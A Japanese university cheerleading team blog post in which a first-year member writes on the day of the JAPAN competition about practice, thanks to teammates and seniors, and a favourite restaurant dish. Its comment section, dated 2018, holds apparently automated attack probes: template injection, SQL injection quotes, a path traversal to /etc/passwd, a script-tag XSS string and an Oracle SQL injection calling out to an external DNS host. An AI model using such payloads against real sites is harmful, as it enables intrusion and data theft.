JAPAN当日!

おはようございます。RAMS一年のさとしです。更新を遅らせてしまってすみません。

 

とうとうJAPAN当日となりました。夏休みということでチアに思いっきり没頭することができ、個人的にも成長して迎える大会としてとても楽しみにしています。

関東から成長した姿を披露したいと思います。

ここ二日間の練習はとてもいい雰囲気のなか通すことができました。オープニングのど頭の1.5ぜひ成功してもらいたいです!レイアウトとチェアを前でしているので後ろの演技は見ることはできませんが、成功した時には盛り上がりがとても伝わってきます。

本番の青マを思いっきり楽しんでチアをしたいですね!

それと今まで演技を支えてくれた、たまみとけいの2人、ちえさん若さん、そして合同連でお世話になった外部の方々に感謝を感じながら演技したいです。もちろん安江先輩や神宮先輩の声援も心に受け止めています。

 

一年としてできることは限られていますが、RAMSが前向きに楽しくチアができるように声を出していけたらなと思います。今日は全上げしましょう。

 

ところで堀出さんの質問に答えます。そうですねみなさんにご馳走したい料理は

「どうらく豚ひれ肉のソテー サルティンボッカ風、グリーンマスタードのペーストを添えて」ですかね。

多磨霊園のマンマパスタで食べれるのでぜひ来てください。もちろん僕は作っていませんよ。

次は本当に料理が得意なたまみお願いします!次はどんな差し入れのお菓子を作ってくれるのでしょうか。

 
 
                                   

 

コメントをお書きください

コメント: 6
  • #1

    e (火曜日, 25 12月 2018 16:17)

    ${9999163+9999951}

  • #2

    e (火曜日, 25 12月 2018 16:17)

    1'"

  • #3

    e (火曜日, 25 12月 2018 16:18)

    ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

  • #4

    e (火曜日, 25 12月 2018 16:19)

    1'"()&%<acx><ScRiPt >ErqI(9635)</ScRiPt>

  • #5

    e (火曜日, 25 12月 2018 16:20)

    1

  • #6

    e (火曜日, 25 12月 2018 16:20)

    '||UTL_INADDR.get_host_address('dns.'||'sqli.024065.3549-78.3549.6bd4d.1.bxss'||'.me')||'